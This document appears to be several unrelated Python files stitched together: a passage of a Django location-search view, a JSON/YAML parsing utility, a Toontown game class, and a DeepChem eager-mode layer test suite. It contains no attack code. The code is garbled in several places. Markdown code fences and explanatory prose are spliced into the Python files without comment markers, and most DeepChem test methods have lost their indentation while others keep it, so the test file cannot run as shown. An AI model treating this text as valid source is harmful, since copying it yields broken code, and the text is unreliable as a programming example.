        df.columns = ['id', 'group_membership', 'longitude', 'latitude', 'slogan',
                      'zip_code', 'description', 'map_show_location', 'username',
                      'help_type', 'userImg_Url', 'shop_type']
        # geodesic expects (latitude, longitude) ordering for both points
        df['distance'] = [geodesic((location.latitude, location.longitude), (lat, lon)).miles
                          for lon, lat in zip(df['longitude'], df['latitude'])]
        # keep results within roughly 20 km (12.4 miles)
        df_filt = df[df['distance'] < 12.4]

        # pass the data to the template
        group_membership = [int(x) for x in df_filt['group_membership'].values.tolist()]
        help_type = df_filt['help_type'].values.tolist()
        userImg_Url = df_filt['userImg_Url'].values.tolist()
        slogan = df_filt['slogan'].values.tolist()
        shop_type = df_filt['shop_type'].values.tolist()
        description = df_filt['description'].values.tolist()
        username = df_filt['username'].values.tolist()
        zipcode = df_filt['zip_code'].values.tolist()
        longitudes = df_filt['longitude'].values.tolist()
        latitudes = df_filt['latitude'].values.tolist()
        ids = df_filt['id'].values.tolist()
        map_show_location = [int(x) for x in df_filt['map_show_location'].values.tolist()]
        rname = list(range(0, len(ids)))
        template_table = list(zip(rname, ids, slogan, description, zipcode))
        gotodiv = 'search'
        context = {'longitude': location.longitude, 'latitude': location.latitude,
                   'id': ids, 'userImg_Url': userImg_Url, 'group_membership': group_membership,
                   'longitudes': longitudes, 'latitudes': latitudes, 'slogan': slogan,
                   'description': description, 'gotodiv': gotodiv,
                   'map_show_location': map_show_location, 'template_table': template_table,
                   'username': username, 'help_type': help_type}
    return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
    template_name = 'pages/home.html'


class AboutPageView(TemplateView):
    template_name = 'pages/about.html'
def searchLocation(request):
    form = SearchForm(request)
    if request.method == 'POST':
        form = SearchForm(request.POST)
    return render(request, 'pages/home.html', {'form': form})
def change_password(request):
    if request.method == 'POST':
        form = PasswordChangeForm(request.user, request.POST)
        if form.is_valid():
            user = form.save()
            update_session_auth_hash(request, user)  # Important!
            messages.success(request, 'Your password was successfully updated!')
            return redirect('change_password')
        else:
            messages.error(request, 'Please correct the error below.')
    else:
        form = PasswordChangeForm(request.user)
    return render(request, 'account/password_set.html', {
        'form': form
    })
def privacy(request):
    return render(request, 'pages/privacy.html')


def imprint(request):
    return render(request, 'pages/imprint.html')


def terms(request):
    return render(request, 'pages/terms_conditions.html')


def cookie_policy(request):
    return render(request, 'pages/cookie_policy.html')
# === File: components/icdc-sheepdog/sheepdog/utils/parse.py (repo: CBIIT/icdc-docker, license: Apache-2.0) ===
"""
Utilities for parsing JSON and YAML request bodies.
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import UserError
def oph_raise_for_duplicates(object_pairs):
    """
    Given a list of ordered pairs, construct a dict as with the normal JSON
    ``object_pairs_hook``, but raise an exception if there are duplicate keys,
    with a message describing all violations.
    """
    counter = Counter(p[0] for p in object_pairs)
    duplicates = [p for p in counter.items() if p[1] > 1]
    if duplicates:
        raise ValueError(
            'The document contains duplicate keys: {}'
            .format(','.join(d[0] for d in duplicates))
        )
    return {pair[0]: pair[1] for pair in object_pairs}
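# The same duplicate-key guard works with the standard-library json module,
# which also accepts an object_pairs_hook. A self-contained sketch with
# simplified names (no sheepdog or simplejson imports):

```python
import json
from collections import Counter


def raise_for_duplicates(object_pairs):
    """object_pairs_hook that rejects documents containing duplicate keys."""
    counter = Counter(key for key, _ in object_pairs)
    dupes = [key for key, n in counter.items() if n > 1]
    if dupes:
        raise ValueError('duplicate keys: {}'.format(','.join(dupes)))
    return dict(object_pairs)


print(json.loads('{"a": 1, "b": 2}', object_pairs_hook=raise_for_duplicates))
try:
    json.loads('{"a": 1, "a": 2}', object_pairs_hook=raise_for_duplicates)
except ValueError as exc:
    print("rejected:", exc)
```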
def parse_json(raw):
    """
    Return a python representation of a JSON document.

    Args:
        raw (str): string of raw JSON content

    Raises:
        UserError: if any exception is raised parsing the JSON body

    .. note:: Uses :func:`oph_raise_for_duplicates` in parser.
    """
    try:
        return simplejson.loads(
            raw, object_pairs_hook=oph_raise_for_duplicates
        )
    except Exception as e:
        raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
    """
    Return a python representation of the JSON POST body of the current
    flask request.

    Args:
        expected_types (tuple): types the parsed result is allowed to have

    Raises:
        UserError: if any exception is raised parsing the JSON body
        UserError: if the result is not of the expected type
    """
    parsed = parse_json(flask.request.get_data())
    if not isinstance(parsed, expected_types):
        raise UserError('JSON parsed from request is an invalid type: {}'
                        .format(parsed.__class__.__name__))
    return parsed
def parse_request_yaml():
    """
    Return a python representation of a YAML POST body. Raise UserError if any
    exception is raised parsing the YAML body.
    """
    try:
        return yaml.safe_load(flask.request.get_data())
    except Exception as e:
        raise UserError('Unable to parse yaml: {}'.format(e))
# === File: toontown/coghq/LawbotHQExterior.py (repo: journeyfan/toontown-journey, license: MIT) ===
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
    notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')

    def enter(self, requestStatus):
        CogHQExterior.CogHQExterior.enter(self, requestStatus)

        # Load the CogHQ DNA file:
        dnaStore = DNAStorage()
        dnaFileName = self.genDNAFileName(self.zoneId)
        loadDNAFileAI(dnaStore, dnaFileName)

        # Collect all of the vis group zone IDs:
        self.zoneVisDict = {}
        for i in range(dnaStore.getNumDNAVisGroupsAI()):
            groupFullName = dnaStore.getDNAVisGroupName(i)
            visGroup = dnaStore.getDNAVisGroupAI(i)
            visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
            visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
            visibles = []
            # use a separate index so the outer loop variable isn't shadowed
            for j in range(visGroup.getNumVisibles()):
                visibles.append(int(visGroup.getVisible(j)))
            visibles.append(ZoneUtil.getBranchZone(visZoneId))
            self.zoneVisDict[visZoneId] = visibles

        # Next, we want interest in all vis groups due to this being a Cog HQ:
        base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
# === File: deepchem/models/tensorgraph/tests/test_layers_eager.py (repo: avimanyu786/deepchem, license: MIT) ===
import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
  """
  Test that layers function in eager mode.
  """

  def test_conv_1d(self):
    """Test invoking Conv1D in eager mode."""
    with context.eager_mode():
      width = 5
      in_channels = 2
      filters = 3
      kernel_size = 2
      batch_size = 10
      input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
      layer = layers.Conv1D(filters, kernel_size)
      result = layer(input)
      self.assertEqual(result.shape[0], batch_size)
      self.assertEqual(result.shape[2], filters)
      assert len(layer.trainable_variables) == 2

      # Creating a second layer should produce different results, since it has
      # different random weights.
      layer2 = layers.Conv1D(filters, kernel_size)
      result2 = layer2(input)
      assert not np.allclose(result, result2)

      # But evaluating the first layer again should produce the same result as before.
      result3 = layer(input)
      assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
  def test_combine_mean_std(self):
    """Test invoking CombineMeanStd in eager mode."""
    with context.eager_mode():
      mean = np.random.rand(5, 3).astype(np.float32)
      std = np.random.rand(5, 3).astype(np.float32)
      layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
      result1 = layer(mean, std, training=False)
      assert np.array_equal(result1, mean)  # No noise in test mode
      result2 = layer(mean, std, training=True)
      assert not np.array_equal(result2, mean)
      assert np.allclose(result2, mean, atol=0.1)
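The training/inference split checked above matches the usual reparameterization pattern: identity on the mean at inference, mean plus scaled Gaussian noise during training. A stdlib-only sketch on flat lists (the exact noise scaling inside DeepChem's layer is an assumption here):

```python
import random

def combine_mean_std(mean, std, training, noise_epsilon=0.01, rng=None):
    """Sketch of CombineMeanStd semantics: identity on `mean` at inference;
    mean + noise_epsilon * std * N(0, 1) during training (the scaling is an
    illustrative assumption, consistent with the atol=0.1 check above)."""
    if not training:
        return list(mean)
    rng = rng or random.Random(0)
    return [m + noise_epsilon * s * rng.gauss(0.0, 1.0)
            for m, s in zip(mean, std)]

mean = [0.5, 0.25, 0.75]
std = [1.0, 1.0, 1.0]
assert combine_mean_std(mean, std, training=False) == mean
noisy = combine_mean_std(mean, std, training=True)
assert noisy != mean
assert all(abs(a - b) < 0.1 for a, b in zip(noisy, mean))
```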
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
  def test_interatomic_l2_distances(self):
    """Test invoking InteratomicL2Distances in eager mode."""
    with context.eager_mode():
      atoms = 5
      neighbors = 2
      coords = np.random.rand(atoms, 3)
      neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
      layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
      result = layer(coords, neighbor_list)
      assert result.shape == (atoms, neighbors)
      for atom in range(atoms):
        for neighbor in range(neighbors):
          delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
          dist2 = np.dot(delta, delta)
          assert np.allclose(dist2, result[atom, neighbor])
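The nested loop above verifies the layer entry by entry; the same squared-distance computation can be expressed as a small standalone helper (pure Python, independent of the layer; the function name is mine):

```python
def squared_distances(coords, neighbor_list):
    """coords: list of (x, y, z); neighbor_list[i]: neighbor indices of atom i.
    Returns dist2[i][j] = ||coords[i] - coords[neighbor_list[i][j]]||^2,
    i.e. what InteratomicL2Distances is asserted to produce above."""
    out = []
    for i, nbrs in enumerate(neighbor_list):
        row = []
        for n in nbrs:
            delta = [a - b for a, b in zip(coords[i], coords[n])]
            row.append(sum(d * d for d in delta))
        out.append(row)
    return out

coords = [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.0, 2.0, 0.0)]
print(squared_distances(coords, [[1, 2], [0, 2], [0, 1]]))
# [[1.0, 4.0], [1.0, 5.0], [4.0, 5.0]]
```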
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
"""Test invoking LSTMStep in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_feat = 10
y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
state_one = np.random.rand(n_test, n_feat).astype(np.float32)
layer = layers.LSTMStep(n_feat, 2 * n_feat)
result = layer(y, state_zero, state_one)
h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
assert h_out.shape == (n_test, n_feat)
assert h_copy_out.shape == (n_test, n_feat)
assert c_out.shape == (n_test, n_feat)
assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
def test_weighted_linear_combo(self):
"""Test invoking WeightedLinearCombo in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
layer = layers.WeightedLinearCombo()
result = layer(input1, input2)
assert len(layer.trainable_variables) == 2
expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
  def test_dropout(self):
    """Test invoking Dropout in eager mode."""
    with context.eager_mode():
      rate = 0.5
      input = np.random.rand(5, 10).astype(np.float32)
      layer = layers.Dropout(rate)
      result1 = layer(input, training=False)
      assert np.allclose(result1, input)
      result2 = layer(input, training=True)
      assert not np.allclose(result2, input)
